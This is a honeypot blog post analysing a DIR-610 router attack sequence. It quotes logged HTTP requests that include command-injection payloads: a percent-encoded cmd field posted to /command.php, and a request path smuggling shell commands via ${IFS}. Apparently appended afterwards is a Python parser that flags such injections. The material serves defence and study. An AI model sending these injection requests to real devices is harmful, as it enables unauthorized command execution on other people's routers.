
Wednesday, 11 January 2017

DIR-610 exploit attack seen on Honeypot

On my honeypot I come across this sort of attack quite often. Keep in mind that the honeypot always replies with "200 OK", whatever you send to it.

It is interesting to see how the requests build on each other. As reported in a different post, I tend to believe that the "200 OK" reply is what actually triggers the real exploit attempt.
2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /cgi/common.cgi HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /stssys.htm HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'GET / HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'POST /command.php HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 208\r\n\r\ncmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74']}
translated with urllib.unquote() to
ncmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt

After the first few requests, the attacker can be fairly sure that the system behaves like a DIR-610, because the honeypot reports that every URL probed so far is present.
The command executed creates the file, which the attacker then tries to download in the following call:
2017-01-09 16:53:57 -- {'http': ['181.223.38.29', 'GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
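To turn observations like the ones above into something a defender can run, here is an added example (my own code, not from this blog or the honeypot software) that parses the honeypot's "timestamp -- {'http': [src_ip, raw_request]}" log format, decodes the percent-encoded cmd field of the POST to /command.php the same way urllib.unquote() did above, and flags requests whose path or body carries shell metacharacters such as ${IFS} or &&. The three sample lines are copied from this post; the probe-path list and the metacharacter pattern are heuristics I chose, not anything the DIR-610 or the attacker defines.

```python
"""Parse the honeypot log format shown in the post and flag DIR-610-style
command injection. Added example; the detector heuristics are my own."""
import ast
import re
from urllib.parse import unquote

# Constructed sample: three of the requests quoted in the post, in the honeypot's
# own log format. The repr escapes (\r\n) are decoded by ast.literal_eval below.
SAMPLE_LOG = r"""2017-01-09 16:53:55 -- {'http': ['181.223.38.29', 'GET /cgi/common.cgi HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
2017-01-09 16:53:56 -- {'http': ['181.223.38.29', 'POST /command.php HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 208\r\n\r\ncmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74']}
2017-01-09 16:53:57 -- {'http': ['181.223.38.29', 'GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0\r\nAccept: */*\r\nHost: 81.171.12.232\r\nUser-Agent: Wget(linux)\r\n\r\n']}
"""

# "YYYY-MM-DD HH:MM:SS -- {python dict repr}"
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) -- (\{.*\})$")

# Paths the post shows being probed before the exploit (heuristic list, my choice).
DIR610_PROBE_PATHS = {"/cgi/common.cgi", "/stssys.htm", "/command.php"}

# Shell metacharacters that an HTTP path or form field has no legitimate use for.
# ${IFS} is the classic way to smuggle a space into a request target.
SHELL_INJECTION = re.compile(r"\$\{IFS\}|&&|\|\||`|\$\(|>")


def parse_line(line):
    """Turn one log line into a dict, or return None if it is not in the expected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, rec = m.group(1), ast.literal_eval(m.group(2))
    src, raw = rec["http"]
    head, _, body = raw.partition("\r\n\r\n")       # headers / body split
    request_line = head.split("\r\n", 1)[0]
    parts = request_line.split(" ")
    if len(parts) != 3:                               # "METHOD target HTTP/x.y"
        return None
    method, target, _version = parts
    return {"ts": ts, "src": src, "method": method, "path": target, "body": body}


def decode_form_field(body, name):
    """Return the percent-decoded value of one x-www-form-urlencoded field, or None."""
    for pair in body.split("&"):                      # encoded %26%26 is not split here
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None


def classify(req):
    """Return (stage, detail): what this request looks like from the defender's side."""
    decoded_path = unquote(req["path"])
    if SHELL_INJECTION.search(decoded_path):
        return "command_injection_in_path", decoded_path
    cmd = decode_form_field(req["body"], "cmd") if req["method"] == "POST" else None
    if cmd is not None:
        return "command_injection_in_body", cmd
    if req["path"] in DIR610_PROBE_PATHS:
        return "dir610_probe", req["path"]
    return "other", req["path"]


def analyze(log_text):
    """Parse every well-formed line and return one finding per request, in log order."""
    findings = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        stage, detail = classify(req)
        findings.append({"ts": req["ts"], "src": req["src"], "method": req["method"],
                         "stage": stage, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['method']:4} {f['stage']:26} {f['detail']}")
```

Run as a script it prints the probe, the decoded "cd /var/tmp && echo -ne ..." command from the POST body, and the ${IFS} injection in the GET path, one per line. The point of reporting the decoded command rather than the raw percent-encoded body is that the honeypot's 200 OK makes every stage look successful, so the sequence of stages from one source address is the signal, not any single request.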